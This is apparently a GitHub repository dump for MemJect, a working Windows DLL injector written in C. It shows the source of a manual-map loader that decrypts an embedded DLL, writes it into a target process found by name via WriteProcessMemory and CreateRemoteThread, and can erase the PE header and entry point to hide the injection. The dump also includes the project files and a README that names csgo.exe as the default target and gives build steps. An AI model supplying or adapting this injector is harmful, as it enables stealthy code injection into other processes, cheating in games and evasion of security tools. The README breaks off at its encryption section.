120 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
121 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
122 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
123 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
124 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
125 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
126 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
127 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
128 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
129 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
130 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
131 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
132 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
133 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
134 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
135 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
136 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
137 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
138 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
139 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
140 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
141 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
142 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
143 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
144 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
145 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
146 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
147 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
148 | 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
149 | };
150 | 
151 | #if DECRYPT_DLL
152 | VOID decryptBinary(LPWSTR key)
153 | {
154 |     SIZE_T keyLenth = wcslen(key);
155 | 
156 |     for (int i = 0; i < sizeof(binary); i++)
157 |         binary[i] ^= key[i % keyLenth];
158 | }
159 | #endif
160 | 
161 | typedef struct {
162 |     PBYTE imageBase;
163 |     HMODULE(WINAPI* loadLibraryA)(PCSTR);
164 |     FARPROC(WINAPI* getProcAddress)(HMODULE, PCSTR);
165 |     VOID(WINAPI* rtlZeroMemory)(PVOID, SIZE_T);
166 | } LoaderData;
167 | 
168 | DWORD WINAPI loadLibrary(LoaderData* loaderData)
169 | {
170 |     PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(loaderData->imageBase + ((PIMAGE_DOS_HEADER)loaderData->imageBase)->e_lfanew);
171 |     PIMAGE_BASE_RELOCATION relocation = (PIMAGE_BASE_RELOCATION)(loaderData->imageBase
172 |         + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
173 |     DWORD delta = (DWORD)(loaderData->imageBase - ntHeaders->OptionalHeader.ImageBase);
174 |     while (relocation->VirtualAddress) {
175 |         PWORD relocationInfo = (PWORD)(relocation + 1);
176 |         for (int i = 0, count = (relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); i < count; i++)
177 |             if (relocationInfo[i] >> 12 == IMAGE_REL_BASED_HIGHLOW)
178 |                 *(PDWORD)(loaderData->imageBase + (relocation->VirtualAddress + (relocationInfo[i] & 0xFFF))) += delta;
179 | 
180 |         relocation = (PIMAGE_BASE_RELOCATION)((LPBYTE)relocation + relocation->SizeOfBlock);
181 |     }
182 | 
183 |     PIMAGE_IMPORT_DESCRIPTOR importDirectory = (PIMAGE_IMPORT_DESCRIPTOR)(loaderData->imageBase
184 |         + ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
185 | 
186 |     while (importDirectory->Characteristics) {
187 |         PIMAGE_THUNK_DATA originalFirstThunk = (PIMAGE_THUNK_DATA)(loaderData->imageBase + importDirectory->OriginalFirstThunk);
188 |         PIMAGE_THUNK_DATA firstThunk = (PIMAGE_THUNK_DATA)(loaderData->imageBase + importDirectory->FirstThunk);
189 | 
190 |         HMODULE module = loaderData->loadLibraryA((LPCSTR)loaderData->imageBase + importDirectory->Name);
191 | 
192 |         if (!module)
193 |             return FALSE;
194 | 
195 |         while (originalFirstThunk->u1.AddressOfData) {
196 |             DWORD Function = (DWORD)loaderData->getProcAddress(module, originalFirstThunk->u1.Ordinal & IMAGE_ORDINAL_FLAG ? (LPCSTR)(originalFirstThunk->u1.Ordinal & 0xFFFF) : ((PIMAGE_IMPORT_BY_NAME)((LPBYTE)loaderData->imageBase + originalFirstThunk->u1.AddressOfData))->Name);
197 | 
198 |             if (!Function)
199 |                 return FALSE;
200 | 
201 |             firstThunk->u1.Function = Function;
202 |             originalFirstThunk++;
203 |             firstThunk++;
204 |         }
205 |         importDirectory++;
206 |     }
207 | 
208 |     if (ntHeaders->OptionalHeader.AddressOfEntryPoint) {
209 |         DWORD result = ((DWORD(__stdcall*)(HMODULE, DWORD, LPVOID))
210 |             (loaderData->imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint))
211 |             ((HMODULE)loaderData->imageBase, DLL_PROCESS_ATTACH, NULL);
212 | 
213 | #if ERASE_ENTRY_POINT
214 |         loaderData->rtlZeroMemory(loaderData->imageBase + ntHeaders->OptionalHeader.AddressOfEntryPoint, 32);
215 | #endif
216 | 
217 | #if ERASE_PE_HEADER
218 |         loaderData->rtlZeroMemory(loaderData->imageBase, ntHeaders->OptionalHeader.SizeOfHeaders);
219 | #endif
220 |         return result;
221 |     }
222 |     return TRUE;
223 | }
224 | 
225 | VOID stub(VOID) { }
226 | 
227 | INT WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, INT nShowCmd)
228 | {
229 |     HANDLE processSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
230 |     if (processSnapshot == INVALID_HANDLE_VALUE)
231 |         return 1;
232 | 
233 |     HANDLE process = NULL;
234 |     PROCESSENTRY32W processInfo;
235 |     processInfo.dwSize = sizeof(processInfo);
236 | 
237 |     if (Process32FirstW(processSnapshot, &processInfo)) {
238 |         do {
239 |             if (!lstrcmpW(processInfo.szExeFile, PROCESS_NAME)) {
240 |                 process = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, processInfo.th32ProcessID);
241 |                 break;
242 |             }
243 |         } while (Process32NextW(processSnapshot, &processInfo));
244 |     }
245 |     CloseHandle(processSnapshot);
246 | 
247 |     if (!process)
248 |         return 1;
249 | 
250 | #if DECRYPT_DLL
251 |     INT argc;
252 |     LPWSTR* argv = CommandLineToArgvW(GetCommandLineW(), &argc);
253 | 
254 |     for (INT i = 1; i < argc; i++) {
255 |         if (!lstrcmpW(argv[i], L"-key")) {
256 |             decryptBinary(argv[++i]);
257 |             break;
258 |         }
259 |     }
260 |     LocalFree(argv);
261 | #endif
262 | 
263 |     PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)(binary + ((PIMAGE_DOS_HEADER)binary)->e_lfanew);
264 | 
265 |     PBYTE executableImage = VirtualAllocEx(process, NULL, ntHeaders->OptionalHeader.SizeOfImage,
266 |         MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
267 | 
268 |     WriteProcessMemory(process, executableImage, binary,
269 |         ntHeaders->OptionalHeader.SizeOfHeaders, NULL);
270 | 
271 |     PIMAGE_SECTION_HEADER sectionHeaders = (PIMAGE_SECTION_HEADER)(ntHeaders + 1);
272 |     for (int i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
273 |         WriteProcessMemory(process, executableImage + sectionHeaders[i].VirtualAddress,
274 |         binary + sectionHeaders[i].PointerToRawData, sectionHeaders[i].SizeOfRawData, NULL);
275 | 
276 |     LoaderData* loaderMemory = VirtualAllocEx(process, NULL, 4096, MEM_COMMIT | MEM_RESERVE,
277 |         PAGE_EXECUTE_READ);
278 | 
279 |     LoaderData loaderParams;
280 |     loaderParams.imageBase = executableImage;
281 |     loaderParams.loadLibraryA = LoadLibraryA;
282 |     loaderParams.getProcAddress = GetProcAddress;
283 |     loaderParams.rtlZeroMemory = (VOID(NTAPI*)(PVOID, SIZE_T))GetProcAddress(LoadLibraryW(L"ntdll"), "RtlZeroMemory");
284 | 
285 |     WriteProcessMemory(process, loaderMemory, &loaderParams, sizeof(LoaderData),
286 |         NULL);
287 |     WriteProcessMemory(process, loaderMemory + 1, loadLibrary,
288 |         (DWORD)stub - (DWORD)loadLibrary, NULL);
289 |     WaitForSingleObject(CreateRemoteThread(process, NULL, 0, (LPTHREAD_START_ROUTINE)(loaderMemory + 1),
290 |         loaderMemory, 0, NULL), INFINITE);
291 |     VirtualFreeEx(process, loaderMemory, 0, MEM_RELEASE);
292 | 
293 | #if SUCCESS_MESSAGE
294 |     CHAR buf[100];
295 |     sprintf_s(buf, sizeof(buf), "Dll successfully loaded into %ws at 0x%x", PROCESS_NAME, (DWORD)executableImage);
296 |     MessageBoxA(NULL, buf, "Success", MB_OK | MB_ICONINFORMATION);
297 | #endif
298 |     return TRUE;
299 | }
300 | 


--------------------------------------------------------------------------------
/MemJect/MemJect.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <ProjectGuid>{C30EDDCB-C91E-46CF-A06C-6AEF170A8B8B}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>MemJect</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>MultiByte</CharacterSet>
 34 |     <SpectreMitigation>false</SpectreMitigation>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v142</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>MultiByte</CharacterSet>
 42 |     <SpectreMitigation>false</SpectreMitigation>
 43 |   </PropertyGroup>
 44 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 45 |     <ConfigurationType>Application</ConfigurationType>
 46 |     <UseDebugLibraries>true</UseDebugLibraries>
 47 |     <PlatformToolset>v142</PlatformToolset>
 48 |     <CharacterSet>Unicode</CharacterSet>
 49 |     <SpectreMitigation>false</SpectreMitigation>
 50 |   </PropertyGroup>
 51 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 52 |     <ConfigurationType>Application</ConfigurationType>
 53 |     <UseDebugLibraries>false</UseDebugLibraries>
 54 |     <PlatformToolset>v142</PlatformToolset>
 55 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 56 |     <CharacterSet>Unicode</CharacterSet>
 57 |     <SpectreMitigation>false</SpectreMitigation>
 58 |   </PropertyGroup>
 59 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 60 |   <ImportGroup Label="ExtensionSettings">
 61 |   </ImportGroup>
 62 |   <ImportGroup Label="Shared">
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 74 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 75 |   </ImportGroup>
 76 |   <PropertyGroup Label="UserMacros" />
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 78 |     <LinkIncremental>true</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |     <GenerateManifest>false</GenerateManifest>
 86 |   </PropertyGroup>
 87 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 88 |     <LinkIncremental>false</LinkIncremental>
 89 |   </PropertyGroup>
 90 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 91 |     <ClCompile>
 92 |       <PrecompiledHeader>
 93 |       </PrecompiledHeader>
 94 |       <WarningLevel>Level3</WarningLevel>
 95 |       <Optimization>Disabled</Optimization>
 96 |       <SDLCheck>true</SDLCheck>
 97 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 98 |       <ConformanceMode>true</ConformanceMode>
 99 |     </ClCompile>
100 |     <Link>
101 |       <SubSystem>Windows</SubSystem>
102 |       <GenerateDebugInformation>true</GenerateDebugInformation>
103 |     </Link>
104 |   </ItemDefinitionGroup>
105 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
106 |     <ClCompile>
107 |       <PrecompiledHeader>
108 |       </PrecompiledHeader>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <Optimization>Disabled</Optimization>
111 |       <SDLCheck>true</SDLCheck>
112 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
113 |       <ConformanceMode>true</ConformanceMode>
114 |     </ClCompile>
115 |     <Link>
116 |       <SubSystem>Console</SubSystem>
117 |       <GenerateDebugInformation>true</GenerateDebugInformation>
118 |     </Link>
119 |   </ItemDefinitionGroup>
120 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
121 |     <ClCompile>
122 |       <PrecompiledHeader>
123 |       </PrecompiledHeader>
124 |       <WarningLevel>Level3</WarningLevel>
125 |       <Optimization>MaxSpeed</Optimization>
126 |       <FunctionLevelLinking>true</FunctionLevelLinking>
127 |       <IntrinsicFunctions>true</IntrinsicFunctions>
128 |       <SDLCheck>true</SDLCheck>
129 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
130 |       <ConformanceMode>true</ConformanceMode>
131 |       <StringPooling>true</StringPooling>
132 |       <ExceptionHandling>false</ExceptionHandling>
133 |       <ControlFlowGuard>false</ControlFlowGuard>
134 |       <EnableEnhancedInstructionSet>StreamingSIMDExtensions2</EnableEnhancedInstructionSet>
135 |       <FloatingPointExceptions>false</FloatingPointExceptions>
136 |       <CreateHotpatchableImage>false</CreateHotpatchableImage>
137 |       <InlineFunctionExpansion>AnySuitable</InlineFunctionExpansion>
138 |       <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
139 |       <OmitFramePointers>true</OmitFramePointers>
140 |       <EnableFiberSafeOptimizations>true</EnableFiberSafeOptimizations>
141 |       <MultiProcessorCompilation>true</MultiProcessorCompilation>
142 |     </ClCompile>
143 |     <Link>
144 |       <SubSystem>Windows</SubSystem>
145 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
146 |       <OptimizeReferences>true</OptimizeReferences>
147 |       <GenerateDebugInformation>false</GenerateDebugInformation>
148 |     </Link>
149 |   </ItemDefinitionGroup>
150 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
151 |     <ClCompile>
152 |       <PrecompiledHeader>
153 |       </PrecompiledHeader>
154 |       <WarningLevel>Level3</WarningLevel>
155 |       <Optimization>MaxSpeed</Optimization>
156 |       <FunctionLevelLinking>true</FunctionLevelLinking>
157 |       <IntrinsicFunctions>true</IntrinsicFunctions>
158 |       <SDLCheck>true</SDLCheck>
159 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
160 |       <ConformanceMode>true</ConformanceMode>
161 |     </ClCompile>
162 |     <Link>
163 |       <SubSystem>Console</SubSystem>
164 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
165 |       <OptimizeReferences>true</OptimizeReferences>
166 |       <GenerateDebugInformation>true</GenerateDebugInformation>
167 |     </Link>
168 |   </ItemDefinitionGroup>
169 |   <ItemGroup>
170 |     <ClCompile Include="MemJect.c" />
171 |   </ItemGroup>
172 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
173 |   <ImportGroup Label="ExtensionTargets">
174 |   </ImportGroup>
175 | </Project>


--------------------------------------------------------------------------------
/MemJect/MemJect.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="MemJect.c">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # MemJect [![C](https://img.shields.io/badge/language-C-%23f34b7d.svg)](https://en.wikipedia.org/wiki/C) [![Windows](https://img.shields.io/badge/platform-Windows-0078d7.svg)](https://en.wikipedia.org/wiki/Microsoft_Windows) [![x86](https://img.shields.io/badge/arch-x86-red.svg)](https://en.wikipedia.org/wiki/X86) [![License](https://img.shields.io/github/license/danielkrupinski/MemJect.svg)](LICENSE)
 2 | Simple dll injector designed to load dll from memory. Supports PE header and entry point erasure. Written in C99.
 3 | 
 4 | ## Features
 5 | 
 6 | * load dll from byte array in memory, without storing dll file on disk
 7 | * decrypt encrypted dll buffer
 8 | * erase DLLEntryPoint
 9 | * erase PE header
10 | 
11 | ## Getting started
12 | 
13 | ### Prerequisites
14 | C99 compiler for Windows is required in order to compile MemJect. Microsoft Visual Studio is required to load solution for easy compilation (MemJect.sln).
15 | 
16 | ### Cloning
17 | The very first step in order to compile MemJect is to clone this repo from GitHub to your local computer. Git is required to step futher, if not installed download it [here](https://git-scm.com). Open git bash / git cmd / cmd and enter following command:
18 | ```
19 | git clone https://github.com/danielkrupinski/MemJect.git
20 | ```
21 | `MemJect` folder should have been succesfully created, containing all the source files.
22 | 
23 | ### Compiling from source
24 | 
25 | When you have equiped a copy of source code, next step is opening **MemJect.sln** in Microsoft Visual Studio. If you don't have Visual Studio, compile **MemJect.cpp** using your compilator.
26 | 
27 | Find below line in **MemJect.cpp** and replace **csgo.exe** with your destination process name:
28 | ```c
29 | #define PROCESS_NAME "csgo.exe"
30 | ```
31 | 
32 | Find below line in **MemJect.cpp** and supply your dll in form of byte array there.
33 | You can use [my python script](https://github.com/danielkrupinski/PE2HEX) to convert dll to array of bytes or almost any hex-editor with `export to C` function.
34 | ```c
35 | static const uint8_t binary[] = {
36 | 0x4d, 0x5a, 0x80, 0x00, 0x01, ...
37 | ```
38 | Then change build configuration to `Release | x86` and simply press **Build solution**.
39 | 
40 | If everything went right you should receive `MemJect.exe` binary file.
41 | 
42 | ### Encryption
43 | 


--------------------------------------------------------------------------------